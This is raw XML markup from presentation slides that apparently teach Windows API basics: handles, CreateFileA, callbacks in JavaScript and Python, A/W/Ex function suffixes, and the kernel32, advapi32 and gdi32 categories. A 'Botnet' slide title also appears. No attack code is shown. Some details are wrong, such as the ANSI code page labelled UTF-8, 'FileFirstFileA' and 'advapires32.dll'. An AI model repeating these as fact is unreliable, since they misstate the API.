            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>printf (&amp;ptr) =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6" name="Google Shape;1083;p109" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4212000" y="2586240"/>
            <a:ext cx="4818600" cy="3434760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607"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Windows API</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608"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Handles </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Handles are items that have been opened or created in the OS, such as a window, process, module, menu, file, and so on. </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E.g. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>CreateWindowEx; </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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>DestroyWindow</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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>CreateFile</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="609" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150480" y="5733360"/>
            <a:ext cx="6900480" cy="146268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hFile = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>CreateFileA</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(filename, GENERIC_READ, FILE_SHARE_READ, NULL,</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OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);              </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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Botnet</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="120" name="Google Shape;166;p11" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="50400" y="1196640"/>
            <a:ext cx="9063000" cy="5283720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251640" y="2133000"/>
            <a:ext cx="5135040" cy="475452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GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> action(x, y, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>callback</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>)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return callback(x, y);</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1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> multiplication(x, y)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return x * y;</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1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> addition(x, y)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return x + y;</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alert(action(10, 10, multiplication)); // output: 100</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alert(action(10, 10, addition)); // output: 20</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="611" name="TextShape 2"/>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Windows API</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="TextShape 3"/>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Callback</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="613" name="Google Shape;1094;p110" descr="this is how it works"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3636000" y="1118160"/>
            <a:ext cx="5173200" cy="2742480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702040" y="4263480"/>
            <a:ext cx="3168000" cy="283428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GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> get_square(val): </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> val ** 2 </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1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> caller(func, val): </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> func(val) </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1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>caller(get_square, 5)</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Windows API</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="63000"/>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ANSI vs. Unicode</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Windows XP, NT: ANSI code page</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> (UTF-8) with suffix –A</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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DeleteFileA (LPCSTR lpFileName)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Win2000 and later version: Unicode (UTF-16) with suffix -W</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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DeleteFileW (LPCWSTR lpFileName)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Windows API extended</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Microsoft updates a new function which is incompatible with the old one with the suffix –Ex</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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FileFirstFileA: 2 parameters (lpFileName, lpFindFileData)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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FileFirstFileExA: 6 parameters (lpFileName, fInfoLevelId, lpFindFileData, fSearchOp, lpSearchFilter, dwAdditionalFlags)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Windows API - Category</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="618" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="46000"/>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Base Services</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Provide access to the basic resources available to a Windows system, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>file systems</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>devices</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>processes</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>threads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>error handling </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(Kernel32.dll)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Advanced Services</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Provide access to functions beyond the kernel, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>registry</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>shutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>restart</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>abort</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>stop</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> a service, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>manage user accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> (advapi32.dll, advapires32.dll).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Graphics Device Interface</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>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Provides functions to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>output graphics content </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>to monitors, printers, and other output devices (gdi32.dll)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
